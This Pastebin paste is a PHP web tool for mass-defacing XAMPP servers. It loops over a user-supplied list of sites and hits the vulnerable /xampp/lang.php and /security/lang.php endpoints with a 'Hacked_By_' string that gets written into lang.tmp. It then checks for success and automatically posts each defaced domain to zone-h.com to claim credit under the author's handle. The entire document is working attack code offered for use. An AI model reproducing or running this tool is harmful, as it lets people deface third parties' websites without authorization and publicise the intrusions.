Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php // K4MVR3T717 - Www.IndoFree-Security.Blogspot.Com
- @set_time_limit(0);
- $hekerr = "K4MVR3T717"; // Your Nick
- echo "<form method='POST'>
- <style>
- textarea
- {
- font-size: 15px;
- font-family: Tahoma;
- color: #708090;
- border:solid 1px #708090;
- }
- a {
- font-family: Tahoma;
- color:#708090;
- text-decoration:none;
- }
- h1{
- font-family:Tahoma;
- color:#708090;
- }
- table {
- width:700px;
- }
- td {
- font-family: Tahoma;
- width:50%;
- text-align:center;
- border:1px solid #708090;
- }
- .input
- {
- color: #708090;
- border: solid 1px #708090;
- background:#black;
- margin-top:3px;
- width:100px;
- }
- i {
- color:##708090;
- }
- </style>
- <title>Mass XAMPP Lang + Zone-H Auto Submit</title>
- <body text='red' bgcolor='white'>
- <center>
- <h1>Mass XAMPP Lang + Zone-H Auto Submit</h1>
- <p>www.indofree-security.blogspot.com</p>
- <textarea name='sites' cols='50' rows='10'>www.localhost.com tanpa https://</textarea><br>
- <input type='submit' name='scan' value='SCAN' class='input'><br>
- </form>";
- if($_POST['scan'])
- {
- echo "<hr>"; // else if hr
- $site = explode("\r\n",$_POST['sites']);
- foreach($site as $sites)
- {
- $xxampp = "/xampp/lang.php?Hacked_By_K4MVR3T717";
- $xamppcurl = curl_init("{$sites}/$xxampp");
- curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
- curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
- $resultxampp = curl_exec($xamppcurl);
- $xsecurity = "/security/lang.php?Hacked_By_K4MVR3T717";
- $securitycurl = curl_init("{$sites}/$xsecurity");
- curl_setopt($securitycurl, CURLOPT_FAILONERROR, true);
- curl_setopt($securitycurl, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($securitycurl, CURLOPT_RETURNTRANSFER, true);
- $resultsecurity = curl_exec($securitycurl);
- $xxampptmp = "/xampp/lang.tmp";
- $xampptmpcurl = curl_init("{$sites}/$xxampptmp");
- curl_setopt($xampptmpcurl, CURLOPT_FAILONERROR, true);
- curl_setopt($xampptmpcurl, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($xampptmpcurl, CURLOPT_RETURNTRANSFER, true);
- $resultxampptmp = curl_exec($xampptmpcurl);
- $xsecuritytmp = "/security/lang.tmp";
- $securitytmpcurl = curl_init("{$sites}/$xsecuritytmp");
- curl_setopt($securitytmpcurl, CURLOPT_FAILONERROR, true);
- curl_setopt($securitytmpcurl, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($securitytmpcurl, CURLOPT_RETURNTRANSFER, true);
- $resultsecuritytmp = curl_exec($securitytmpcurl);
- if(eregi("Hacked_By_",$resultxampptmp))
- {
- echo "<a href='http://$sites/$xxampptmp' style='text-decoration: none'>{$sites}$xxampptmp</a><br>Xampp/Lang<br>";
- $finalxampp=($sites).($xxampptmp);
- $ch = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=$hekerr&domain1=$finalxampp&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">DEFACED<\/font><\/li>/i", curl_exec ($ch))){
- echo "Zone-h : OK<hr>";
- }else{
- echo "Zone-h : NO<hr>"; }
- curl_close ($ch);
- }
- else if(eregi("Hacked_By_",$resultsecuritytmp))
- {
- echo "<a href='http://$sites/$xsecuritytmp' style='text-decoration: none'>{$sites}$xsecuritytmp</a><br>Security/Lang<br>";
- $finalsecurity=($sites).($xsecuritytmp);
- $ch = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=AHS-CREW&domain1=$finalsecurity&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
- echo "Zone-h : DONE<hr>";
- }else{
- echo "Zone-h : ERROR<hr>"; }
- curl_close ($ch);
- }
- else
- {
- echo "<a href='http://$sites/'>$sites</a><br>ERROR<hr>";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment